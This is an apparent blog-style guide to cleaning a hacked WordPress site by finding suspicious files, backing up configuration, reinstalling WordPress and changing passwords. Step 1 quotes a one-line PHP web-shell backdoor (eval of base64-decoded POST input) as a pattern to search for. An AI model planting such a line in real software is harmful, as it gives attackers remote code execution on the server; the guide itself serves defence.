Hackers do not need to have your hosting or wordpress password to be able to hack and they normally do it through outdated and unsecure plugins or themes.
Not to worry, it is easy to fix by following the steps below:
Step 1: Find Suspicious Files in your hosting account
Hackers normally upload files with file names similar to actual wordpress files such as wp-tmp.php, wp-class.php, 404.php and they normally put it in your main public_html folder or wp-admin or wp-content and wp-content/uploads folder. These files will contain suspicious codes inside as well such as
eval(base64_decode and <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>. If you found any, be sure to delete them immediately.
Step 2: Backup wp-config.php and wp-content folderWe will need to backup the above as those contain settings and the contents (images, plugins, etc) to your Wordpress install.
Step 3: Restore Clean Wordpress
Delete all files and folders. Download latest and clean Wordpress from http://wordpress.org and copy/upload all files to your hosting account
Step 4: Restore your wp-config.php and wp-content folder
Upload and replace the wp-config.php and wp-content folder with your backed up version to retain your wordpress settings and content
Step 5: Prevent future hacks
To prevent future hacks, make sure to use only trusted themes and plugins and stay away from Pirated ones. Change all password including cPanel and Wordpress passwords and delete any suspicious Admin users in wp-admin.
Reinstalling your plugins will also be a good step to help prevent future hacks. You can do this by deleteing the plugin in the wp-admin and then reinstalling them (or delete in wp-content/plugins folder then reinstall).
Keeping Wordpress and Themes/Plugins updated is the key to having a hack-proof site.
